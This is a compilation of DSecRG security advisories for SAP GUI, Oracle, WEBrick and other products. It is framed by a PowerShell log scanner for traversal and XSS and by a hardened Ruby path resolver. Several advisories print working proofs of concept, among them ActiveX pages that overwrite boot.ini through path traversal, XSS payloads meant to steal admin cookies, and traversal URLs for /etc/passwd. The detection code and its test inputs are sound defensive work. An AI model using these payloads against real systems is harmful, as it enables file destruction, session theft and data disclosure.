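        $name, $value = $pair -split '=', 2
        if ($null -eq $value) { $value = '' }
        $value = $value.Replace('+', ' ')
        $result[$name] = [uri]::UnescapeDataString([uri]::UnescapeDataString($value))
    }
    return $result
}

function Test-Request {
    # Return a finding object for a suspicious URL, or $null when nothing matches.
    param([string]$Url)
    if ($Url -match '^https?://[^/]+(/.*)$') { $Url = $Matches[1] }   # absolute-form request line
    $path, $query = $Url -split '\?', 2
    foreach ($rule in $Rules) {
        if (-not $path.StartsWith($rule.Path, [System.StringComparison]::OrdinalIgnoreCase)) { continue }
        if (-not $query) { return $null }   # endpoint hit without parameters: nothing to inspect
        $params = Get-QueryParams $query
        foreach ($p in $rule.Params) {
            if (-not $params.ContainsKey($p)) { continue }
            $v = [string]$params[$p]
            $hit = switch ($rule.Kind) {
                'traversal' { $v -match '\.\.[/\\]' }                         # ../ or ..\ after decoding
                'xss'       { $v -match '(?i)(<|>|javascript:|\bon\w+\s*=)' } # tags, js: URLs, event handlers
            }
            if ($hit) {
                return [pscustomobject]@{ Rule = $rule.Note; Path = $rule.Path; Param = $p; Value = $v }
            }
        }
    }
    return $null
}

function Find-SuspiciousRequests {
    # Scan log lines and emit one finding per suspicious request, tagged with the client address.
    param([string[]]$Lines)
    foreach ($line in $Lines) {
        if ($line -match '"(?<method>[A-Z]+) (?<url>\S+) HTTP/[\d.]+"') {
            $finding = Test-Request -Url $Matches['url']
            if ($null -ne $finding) {
                $finding | Add-Member -NotePropertyName Client -NotePropertyValue ($line -split ' ')[0] -PassThru
            }
        }
    }
}

# Constructed sample log lines (not real traffic). The second and third lines
# carry the payload shapes from the advisories and are the ones that get flagged.
$SampleLog = @(
    '10.0.0.5 - - [14/Jan/2011:10:00:01 +0300] "GET /InfoViewApp/logon.jsp HTTP/1.1" 200 5123'
    '10.0.0.9 - - [14/Jan/2011:10:00:07 +0300] "GET /PerformanceManagement/jsp/qa.jsp?func=browse&root=wi&path=../../../../../../boot.ini HTTP/1.1" 200 311'
    '10.0.0.9 - - [14/Jan/2011:10:00:12 +0300] "GET /InfoViewApp/jsp/common/actionNav.faces?actId=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 4021'
    '10.0.0.7 - - [14/Jan/2011:10:00:15 +0300] "GET /PerformanceManagement/jsp/qa.jsp?func=browse&root=wi&path=reports/2010/q4 HTTP/1.1" 200 812'
)

Find-SuspiciousRequests -Lines $SampleLog | Format-Table -AutoSize
# Against a real log:  Find-SuspiciousRequests -Lines (Get-Content .\access.log)
```

A legitimate browse of a relative report path (the fourth sample line) is not flagged, so the output is a short list of requests worth correlating with the user session in the application's own audit log.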
[DSecRG-09-053] VMware Remote Console - format string
Digital Security Research Group [DSecRG] Advisory DSECRG-09-053

Application: VMware Remote Console
Version: e.x.p build-158248
Vendor URL: http://vmware.com
Bugs: Format String Vulnerabilities
Exploits: YES (PoC)
Reported: 07.08.2009
Vendor response: 13.08.2009
Date of Public Advisory: 09.04.2010
CVE: CVE-2009-3732
VSA: VMSA-2010-0007
Authors: Alexey Sintsov of Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***********

The VMware Remote Console plug-in can be installed from the web interface of VMware vSphere. This software consists of ActiveX objects and executable files for the remote console of a guest OS. VMrc is vulnerable to format string attacks. Exploitation of this issue may lead to arbitrary code execution on the system where VMrc is installed.

Details
*******

Details are in the official advisory: http://dsecrg.com/pages/vul/show.php?id=153

References
**********

http://dsecrg.com/pages/vul/show.php?id=153
http://lists.vmware.com/pipermail/security-announce/2010/90.html
[DSECRG-09-049] IBM BladeCenter Management Module - DoS vulnerability
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-049

Application: IBM BladeCenter Management Module
Versions Affected: before BPET50G
Vendor URL: http://www-03.ibm.com/systems/bladecenter/
Bug: DoS
Exploits: YES
Reported: 24.07.2009
Vendor response: 26.07.2009
Date of Public Advisory: 15.04.2010
Solution: YES
Author: Alexey Sintsov of Digital Security Research Group [DSecRG]

Description
***********

The BladeCenter management module is a hot-swappable hardware device plugged into the BladeCenter chassis management bay. The management module functions as a system-management processor (service processor) and keyboard, video, and mouse (KVM) multiplexor for blade servers. This device can be remotely rebooted.

Details
*******

Details are in the official advisory: http://dsecrg.com/pages/vul/show.php?id=149

Solution
********

The issue has been fixed in AMM firmware version bpet50g and later.

References
**********

http://dsecrg.com/pages/vul/show.php?id=149
http://www-947.ibm.com/systems/support/supportsite.wss/docdisplay?lndocid=MIGR-5083945&brandind=520
[DSECRG-09-064] SAP GUI - Insecure method, code execution
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-064

Application: SAP GUI
Versions Affected: SAP GUI (SAP GUI 7.1)
Vendor URL: http://SAP.com
Bugs: Insecure method. Code Execution.
Exploits: YES
Reported: 16.10.2009
Vendor response: 27.10.2009
Date of Public Advisory: 23.03.2010
Author: Alexey Sintsov from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***********

An insecure method was found in the SAPBExCommonResources (class BExGlobal) ActiveX control component, which is a part of SAP GUI.

Details
*******

Details can be found at http://dsecrg.com/pages/vul/show.php?id=164

Fix Information
***************

All patches have been available since December via note 1407285.

References
**********

http://dsecrg.com/pages/vul/show.php?id=164
https://service.sap.com/sap/support/notes/1407285
[DSECRG-09-039] Symantec Antivirus 10.0 ActiveX - buffer Overflow.
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-039

Application: Symantec Antivirus Client Proxy
Versions Affected: Version 10
Vendor URL: http://symantec.com
Bugs: Buffer Overflow
Exploits: POC
Reported: 04.05.2009
Vendor response: 07.05.2009
Date of Public Advisory: 17.02.2010
CVE-number: CVE-2010-0108
Author: Alexander Polyakov, Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***********

Symantec Antivirus Client Proxy, CLIproxy.dll, contains an ActiveX component which is vulnerable to a buffer overflow attack.

Details
*******

http://dsecrg.com/pages/vul/show.php?id=139

Fix Information
***************

Symantec product engineers have released a fix for this issue in the MR9 update. Symantec recommends all customers apply the latest available update to protect against threats of this nature. Symantec is not aware of any exploitation of or adverse customer impact from these issues.

References
**********

Symantec would like to thank Alexander Polyakov from DSecRG for reporting these issues and coordinating with us while Symantec resolved them.

http://dsecrg.com/pages/vul/show.php?id=139
http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2010&suid=20100217_02
[DSECRG-09-065] TVUPlayer PlayerOcx.ocx ActiveX - Insecure method
An ActiveX component contains an insecure method that can overwrite any file in the system.

Digital Security Research Group [DSecRG] Advisory #DSECRG-09-065

Application: TVUPlayer
Versions Affected: Tested on v2.4.9beta1 [build1797]
Vendor URL: www.tvunetworks.com
Bugs: insecure method, File overwriting
Exploits: YES
Reported: 25.11.2009
Second report: 11.01.2010
Vendor response: none
Date of Public Advisory: 03.02.2010
CVE-number:
Author: Evdokimov Dmitriy, Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***********

TVUPlayer contains the ActiveX component PlayerOcx (file PlayerOcx.ocx), Lib GUID: {18E6ED0D-08D1-4ED5-8771-E72B4E6EFFD8}, which contains an insecure method that can overwrite any file in the system.

Details
*******

Details can be found in the official advisory: http://dsecrg.com/pages/vul/show.php?id=165

Fix Information
***************

There is no official fix from the vendor, because the vendor did not respond to either of the two reports. As an alternative, users can set the kill bit on this component.

References
**********

http://dsecrg.com/pages/vul/show.php?id=165
[DSECRG-09-011] HP StorageWorks 1_8 G2 Tape Autoloader - privilege escalation DOS
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-011

Application:             HP StorageWorks 1/8 G2 Tape Autoloader
Versions Affected:       firmware v 2.30 and earlier
Vendor URL:              http://hp.com/
Bug:                     Privilege escalation
Exploits:                YES
Reported:                30.09.2008
Vendor Response:         30.09.2008
Date of Public Advisory: 10.01.2010
Solution:                yes
CVE:                     CVE-2009-2680
CVSS 2.0:                8.5
Author:                  Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***
A vulnerability was found in the Web Administration Interface of the HP StorageWorks 1/8 G2 Tape Autoloader device. The default unprivileged user can escalate privileges to administrator.

Details
***
http://dsecrg.com/pages/vul/show.php?id=111

About
*
Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com

Polyakov Alexandr. PCI QSA.
Head of security audit department
Head of Digital Security Research Group
DIGITAL SECURITY
---
-- End of forwarded message --

Polyakov Alexandr
Head of security audit department
Head of Digital Security Research Group
DIGITAL SECURITY
[DSECRG-09-044] SAP GUI 7.1 Insecure Methods
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-044

Application:             EnjoySAP, SAP GUI for Windows 6.4 and 7.1
Versions Affected:       Tested on 7100.2.7.1038 PL 7
Vendor URL:              http://SAP.com
Bugs:                    insecure method, file overwriting
Exploits:                YES
Reported:                02.07.2009
Vendor response:         02.07.2009
Date of Public Advisory: 22 Sep
CVE-number:
Author:                  Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***
SAP GUI for Windows 7.1 and 6.4 contains the ActiveX component EAI WebViewer3D (file WebViewer3D.dll), Lib GUID {AFBBE070-7340-11d2-AA6B-00E02924C34E}, which contains an insecure method that can overwrite any file in the system.

Details
***
An attacker can construct an HTML page which calls one of the vulnerable functions from the ActiveX component EAI WebViewer3D, such as:
1) SaveToSessionFile
2) SaveViewToSessionFile

Example 1:

<HTML>
<BODY>
<object id=ctrl classid=clsid:{AFBBE070-7340-11d2-AA6B-00E02924C34E}></object>
<SCRIPT>
function Do_1t()
{
  File = "../../../../../../../../../../../../boot.ini"
  ctrl.SaveToSessionFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_1t() type=button value=P0c>
</BODY>
</HTML>

Example 2:

<HTML>
<BODY>
<object id=ctrl classid=clsid:{AFBBE070-7340-11d2-AA6B-00E02924C34E}></object>
<SCRIPT>
function Do_1t()
{
  File = "../../../../../../../../../../../../boot.ini"
  ctrl.SaveViewToSessionFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_1t() type=button value=P0c>
</BODY>
</HTML>

For example, we can overwrite the boot.ini file or sapgui.ini, which contains all connections to SAP servers.

Fix Information
***

About
*
Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
[DSECRG-09-043] SAP GUI 7.1 Insecure Method
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-043

Application:             EAI WebViewer2D (EnjoySAP, SAP GUI for Windows 6.4 and 7.1)
Versions Affected:       Tested on 7100.2.7.1038 PL 7
Vendor URL:              http://SAP.com
Bugs:                    insecure method, file overwriting
Exploits:                YES
Reported:                02.07.2009
Vendor response:         02.07.2009
Date of Public Advisory: 28.09.2009
CVE-number:
Author:                  Alexandr Polyakov
                         Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***
SAP GUI for Windows 7.1 and 6.4 contains the ActiveX component EAI WebViewer2D (file WebViewer2D.dll), Lib GUID {A76CEBEE-7364-11D2-AA6B-00E02924C34E}, which contains an insecure method that can overwrite any file in the system.

Details
***
An attacker can construct an HTML page which calls the vulnerable function SaveToSessionFile from the ActiveX component EAI WebViewer2D.

Example 1:

<HTML>
<BODY>
<object id=ctrl classid=clsid:{A76CEBEE-7364-11D2-AA6B-00E02924C34E}></object>
<SCRIPT>
function Do_1t()
{
  File = "../../../../../../../../../../../../boot.ini"
  ctrl.SaveToSessionFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_1t() type=button value=P0c>
</BODY>
</HTML>

For example, we can overwrite the boot.ini file or sapgui.ini, which contains all connections to SAP servers.

Fix Information
***
The security issue is addressed with SAP note 1372153. The methods given in the message have recently been changed to return immediately and do nothing.

References
**
http://dsecrg.com/pages/vul/show.php?id=143
https://service.sap.com/sap/support/notes/1372153

About
*
Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com

Polyakov Alexandr
Information Security Analyst
DIGITAL SECURITY
[DSECRG-09-033] SAP Netweaver UDDI - XSS Security Vulnerability
http://www.dsecrg.com/pages/vul/show.php?id=133

Digital Security Research Group [DSecRG] Advisory #DSECRG-09-033

Application:             SAP NetWeaver Application Server (Java)
Versions Affected:       Version 7.0
Vendor URL:              http://SAP.com
Bugs:                    XSS
Exploits:                YES
Reported:                18.03.2009
Vendor response:         19.03.2009
Date of Public Advisory: 11.08.2009
CVE-number:
Author:                  Alexander Polyakov
                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***
The SAP NetWeaver Application Server (Java) system has a Linked XSS security vulnerability in the UDDI client.

Details
***
Linked XSS vulnerability in the UDDI client.
The vulnerability was found in the page /uddiclient/process; the vulnerable field is TModel Key.

Example
***
aa<img/src=javascript:alert('dsecrg xss')>

Fix Information
***
The issue has been solved. See SAP note 1322098.

References:
***
SAP note 1322098
https://service.sap.com/sap/support/notes/1322098
DSecRG-09-033
http://www.dsecrg.com/pages/vul/show.php?id=133

About
*
Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com

Polyakov Alexandr
Chief Information Security Analyst
DIGITAL SECURITY
[DSECRG-09-015] SAP GUI 6.4 Buffer Overflow vulnerability
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-015

Original Advisory: http://dsecrg.com/pages/vul/show.php?id=115

Application:             SAP GUI for Windows, EnjoySAP
Versions Affected:       Version 6.4
Vendor URL:              http://SAP.com
Bugs:                    Buffer Overflow
Exploits:                YES
Reported:                13.11.2008
Vendor response:         17.11.2008
Date of Public Advisory: 08.06.2009
CVE-number:
Author:                  Alexander Polyakov
                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***
SAP GUI for Windows version 6.4 contains the ActiveX component SAPIrRfc, which is vulnerable to a buffer overflow attack.
file = sapirrfc.dll
GUID = F6908F83-ADA6-11D0-87AA-00AA00198702

Details
***
An attacker can construct an HTML page which calls the vulnerable function Accept from the ActiveX object SAPIrRfc with a long parameter. When a user opens this vulnerable page, it causes a DoS (Example 1) or full remote control of the target system (Example 2, which executes calc.exe, is available on request).

Example 1:
*
<html>
<object classid='clsid:77F12F8A-F117-11D0-8CF1-00A0C91D9D87' id='target' />
<script>
arg1=
target.Accept arg1
</script>
</html>

Fix Information
***
The issue has been solved. See SAP note 1286637.

References:
***
SAP note 1286637
https://service.sap.com/sap/support/notes/1286637
http://dsecrg.com/pages/vul/show.php?id=115

About
*
Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com

Regards,
Alexander Polyakov
Digital Security Research Group [DSecRG]
DIGITAL SECURITY
tel/fax: +7(812)703-1547
tel: +7(812)430-9130
e-mail: resea...@dsecrg.com
web: www.dsecrg.com
[DSECRG-09-016] SAP SAPDB Multiple XSS
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-016

!!! original advisory !!! http://dsecrg.com/pages/vul/DSECRG-09-016.html

Application:             SAPDB
Versions Affected:       Last
Vendor URL:              http://SAP.com
Bugs:                    XSS
Exploits:                YES
Reported:                20.11.2008
Vendor response:         20.11.2008
Date of Public Advisory: 31.03.2009
CVE-number:
Author:                  Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***
The SAP MaxDB Web Database engine, which listens on a network port, has a Linked XSS security vulnerability.

Details
***
A Linked XSS vulnerability was found in the script webdbm. The vulnerable parameters are:
Server
Database
User

An attacker can inject XSS into these parameters and steal the administrator's cookie. Alternatively, he can make a fake login page by injecting a script that changes the login page and sends passwords to the attacker when a user tries to log on.

Example:
***
http://[server]:/webdbm?Event=DBM_LOGON&Action=VIEW&Server=&Database=[XSS]
http://[server]:/webdbm?Event=DBM_LOGON&Action=VIEW&Server=&User=[XSS]
http://[server]:/webdbm?Event=DBM_LOGON&Action=VIEW&Server=&Database=&User=&Password=[XSS]

Solution
***
The responsible development unit said that webdbm is outdated and that customers should deinstall it and use the Database Studio instead. See SAP note 1281820.

References:
***
SAP note 1281820.

About
*
Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.dsec.ru

Polyakov Alexandr
Information Security Analyst
DIGITAL SECURITY
Re[2]: [DSECRG-09-009] APC PowerChute Network Shutdown's Web Interface - XSS vulnerability
Hello, Vladimir. You wrote on 26 February 2009, 21:46:28:

> Dear Digital Security Research Group,
>
> --Thursday, February 26, 2009, 7:40:50 PM, you wrote to bugtraq@securityfocus.com:
>
> DSRG> Application: APC PowerChute Network Shutdown's Web Interface
> DSRG> Vendor URL: http://www.apc.com/
> DSRG> Bug: XSS/Response Splitting
> DSRG> Solution: Use Firewall
>
> Just wondering: how can a firewall protect against XSS/response splitting?

This solution was taken from the vendor's advice.

Polyakov Alexandr
Information Security Analyst
DIGITAL SECURITY
Oracle CPU Jan 2009 Advisories.
Advisories for Oracle CPU January 2009 vulnerabilities attached.

Polyakov Alexandr
Information Security Analyst
DIGITAL SECURITY

---

Digital Security Research Group [DSecRG] Advisory #DSECRG-09-001

Application:             Oracle Application Server (SOA)
Versions Affected:       Oracle Application Server (SOA) version 10.1.3.1.0
Vendor URL:              http://www.oracle.com
Bugs:                    XSS
Exploits:                YES
Reported:                10.01.2008
Vendor response:         11.01.2008
Date of Public Advisory: 13.01.2009
CVE:                     CVE-2008-4014
Description:             XSS IN BPELCONSOLE/DEFAULT/ACTIVITIES.JSP
Author:                  Alexandr Polyakov
                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***
A Linked XSS vulnerability was found in the BPEL module of Oracle Application Server (Oracle SOA Suite).

Details
***
A Linked XSS vulnerability was found in the BPEL module. In the page BPELConsole/default/activities.jsp an attacker can inject XSS by appending it to the URL.

Example
***
http://[localhost]:/BPELConsole/default/activities.jsp?'<script>alert('DSEC_XSS')</script>=DSecRG

The attacker must send the injected link to an administrator and gets the administrator's cookie.

Code with injected XSS:

</th>
<th id=activityLabel class=ListHeader align=left nowrap>
<a href='activities.jsp?'<script>alert('DSecRG_XSS')</script>=DSecRG&orderBy=label' class=HeaderLink>
Activity Label
</a>
</th>
---

Fix Information
***
Information was published in CPU January 2009.
All customers can download CPU patches following the instructions from:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

Credits
***
Oracle gives credit to Alexander Polyakov from Digital Security Company in CPU January 2009.
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

About
*
Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsec [dot] ru
http://www.dsecrg.ru
http://www.dsec.ru

Digital Security Research Group [DSecRG] Advisory #DSECRG-09-002

Application:             Oracle BEA Weblogic 10
Versions Affected:       Oracle BEA Weblogic 10
Vendor URL:              http://oracle.com
Bugs:                    Multiple XSS Vulnerabilities in samples
Exploits:                YES
Reported:                16.07.2008
Vendor response:         18.07.2008
Last response:           30.10.2008
Description:             reviewService sample of WebLogic Server.
Date of Public Advisory: 13.01.2009
Authors:                 Alexandr Polyakov
                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***
Multiple XSS vulnerabilities were found in Oracle BEA Weblogic Server samples version 10.2 and latest.

Details
***
Vulnerabilities were found in the reviewService sample of Weblogic Server.

1. Linked XSS found in the createArtist_service.jsp page. Vulnerable parameter: name

Example
***
http://testserver.com:7001/reviewService/createArtist_service.jsp?name=<script>alert('DSECRG')</script>

2. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter: title

Example
***
http://testserver.com:7001/reviewService/addBooks_session_ejb21.jsp?name=111&title=<script>alert('DSECRG')</script>

3
[DSECRG-08-028] File read in Velocity web-server
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-028

Application:             Velocity web-server (a part of Velocity Security Management System)
Versions Affected:       Old version 1.0
Vendor URL:              http://hirschelectronics.com
Bugs:                    Directory traversal, File Download
Exploits:                YES
Reported:                03.03.2008
Second report:           14.03.2008
Vendor response:         14.03.2008
Solution:                No updates for this version. Download the new version.
Date of Public Advisory: 16.07.2008
Authors:                 Digital Security Research Group [DSecRG]

Description
***
The Velocity web-server has a critical directory traversal vulnerability.

Details
***
A directory traversal vulnerability was found in the Velocity web-server. An attacker can exploit this by sending a URL containing a directory traversal sequence.

Example:
http://[server]:[port]/../../../../../../../../../../../../../etc/passwd

Fix Information
***
Version 1.0 is very old and does not have updates. If you have this version, please download the latest version from http://hirschelectronics.com

About
*
Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)

Polyakov Alexandr
Information Security Analyst
DIGITAL SECURITY
[DSECRG-08-018] Ruby 1.8.6 (Webrick Httpd 1.3.1) Directory traversal file Download Vulnerability
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-018

Application:             Ruby 1.8.6 (WEBrick Web server Toolkit and applications that use WEBrick, like Metasploit 3.1)
Versions Affected:       Ruby 1.8.4 and all prior versions
                         1.8.5-p114 and all prior versions
                         1.8.6-p113 and all prior versions
                         1.9.0-1 and all prior versions
Vendor URL:              http://www.ruby-lang.org/
Bugs:                    Directory traversal, File Download
Exploits:                YES
Reported:                20.02.2008
Vendor response:         22.02.2008
Solution:                03.03.2008
Date of Public Advisory: 06.03.2008
Authors:                 Alexandr Polyakov, Stas Svistunovich
                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***
The WEBrick Httpd server has a directory traversal security vulnerability.

WEBrick is an HTTP server library written in Ruby that uses servlets to extend its capabilities. Built into WEBrick are four servlets, handling CGI, ERb, file directories, and a generic Proc servlet. Ruby on Rails uses WEBrick as a quick and easy web server to start developing your Rails applications. However, for whatever ease of development WEBrick adds to your application, it is generally considered not suitable for any production environment.

Details
***
The following programs are vulnerable:
Programs that publish files using WEBrick::HTTPServer.new with the :DocumentRoot option
Programs that publish files using WEBrick::HTTPServlet::FileHandler

Affected systems are:
1. Systems that accept backslash (\) as a path separator, such as Windows.
2. Systems that use case-insensitive filesystems, such as NTFS on Windows and HFS on Mac OS X.

This vulnerability has the following impacts:
1. An attacker can access private files by sending a URL with a URL-encoded backslash (\). This exploit works only on systems that accept backslash as a path separator.
Example:
http://[server]:[port]/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
2. An attacker can access files that match the patterns specified by the :NondisclosureName option (the default value is [.ht*, *~]). This exploit works only on systems that use case-insensitive filesystems.

Additional info
***
WEBrick is used to build custom HTTP servers and is used in many applications such as Metasploit 3.1 and Karma Tools.

Fix Information
***
Fixed on 03.03.2008.
http://www.ruby-lang.org/en/news/2008/03/03/webrick-file-access-vulnerability/

Patches can be downloaded here:

1.8 series
Please upgrade to 1.8.5-p115 or 1.8.6-p114.
URL: ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.5-p115.tar.gz (md5sum: 20ca6cc87eb077296806412feaac0356)
URL: ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.6-p114.tar.gz (md5sum: 500a9f11613d6c8ab6dcf12bec1b3ed3)

1.9 series
Please apply the following patch to lib/webrick/httpservlet/filehandler.rb.
URL: ftp://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.0-1-webrick-vulnerability-fix.diff (md5sum: b7b58aed40fa1609a67f53cfd3a13257)

About
*
Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)

--
Digital Security Research Group
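The two conditions the WEBrick advisory above describes, a URL-encoded backslash being honoured as a path separator and a case-insensitive filesystem defeating the :NondisclosureName patterns, are both closed by a file handler that normalises the request path itself instead of trusting the filesystem. The Ruby below is an added example written for this page, not WEBrick's code and not the vendor's patch: the document root, the request paths and the helper names (`percent_decode`, `resolve_under_root`) are constructed for illustration, and the nondisclosure list simply mirrors the default the advisory quotes.

```ruby
# Added example (not WEBrick's code): a hardened path resolver for a static
# file handler. It enforces the two rules the advisory is about:
#   1. a percent-encoded backslash is never accepted as a path separator;
#   2. :NondisclosureName patterns are matched case-insensitively, so a
#      case-insensitive filesystem (NTFS, HFS+) cannot be used to bypass them.

# Constructed document root and nondisclosure list; the list mirrors the
# default value quoted in the advisory ([.ht*, *~]).
DOC_ROOT = "/srv/www/htdocs"
NONDISCLOSURE = [".ht*", "*~"]

# Percent-decodes a request path exactly once. "+" is left alone because it is
# a literal character in a path, unlike in a query string.
def percent_decode(str)
  str.gsub(/%([0-9A-Fa-f]{2})/) { $1.hex.chr }
end

# Returns the absolute filesystem path for request_path under root, or nil
# when the request must be refused (traversal, backslash, hidden-file pattern).
def resolve_under_root(root, request_path, nondisclosure = NONDISCLOSURE)
  path = percent_decode(request_path)

  # Rule 1: refuse backslashes on every platform. Relying on the OS to treat
  # "\" as an ordinary character is exactly what failed on Windows.
  return nil if path.include?("\\")

  # Reduce the path to a stack of segments so ".." can never climb above root,
  # whatever the filesystem does with separators or case.
  segments = []
  path.split("/").each do |seg|
    next if seg.empty? || seg == "."
    if seg == ".."
      return nil if segments.empty?   # attempt to leave the document root
      segments.pop
    else
      segments << seg
    end
  end

  # Rule 2: FNM_CASEFOLD makes ".HTACCESS" match ".ht*" just like ".htaccess".
  segments.each do |seg|
    nondisclosure.each do |pattern|
      return nil if File.fnmatch?(pattern, seg, File::FNM_CASEFOLD)
    end
  end

  # Final containment check on the expanded path (belt and braces).
  root_abs = File.expand_path(root)
  resolved = File.expand_path(File.join(root_abs, *segments))
  return nil unless resolved == root_abs || resolved.start_with?(root_abs + "/")
  resolved
end

# Constructed requests, one per rule, for a stand-alone run.
SAMPLE_REQUESTS = [
  "/index.html",                    # plain file: allowed
  "/docs/../index.html",            # ".." that stays inside root: allowed
  "/../../../etc/passwd",           # climbs above root: refused
  "/..%5c..%5c..%5c..%5cboot.ini",  # encoded backslash: refused
  "/.HTACCESS",                     # case-folded hidden file: refused
  "/notes.txt~",                    # editor backup file: refused
]

if __FILE__ == $0
  SAMPLE_REQUESTS.each do |req|
    puts "#{req.ljust(32)} => #{resolve_under_root(DOC_ROOT, req).inspect}"
  end
end
```

The resolver decodes once and then reasons about segments, so the result is the same on Windows, NTFS or HFS+ as on a case-sensitive Linux host; a handler that instead lets the OS interpret the decoded string inherits that OS's separator and case rules, which is the behaviour the advisory exploits.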